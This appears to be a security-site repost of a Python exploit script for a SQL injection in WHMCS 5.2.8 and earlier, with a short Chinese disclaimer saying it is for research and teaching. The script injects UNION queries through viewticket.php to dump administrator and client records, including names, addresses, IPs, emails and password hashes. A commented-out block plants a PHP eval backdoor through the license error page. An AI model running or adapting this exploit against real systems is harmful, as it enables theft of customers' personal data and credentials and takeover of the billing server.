WHMCS 5.2.8 EXP

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection # http://localhost.re/p/whmcs-528-vulnerability

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
print "Doing stuff: %s" % sqlUnion
#you could exploit any file that does a select, I randomly chose viewticket.php
r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
return re.search(r'

(.*?)

', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):
print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()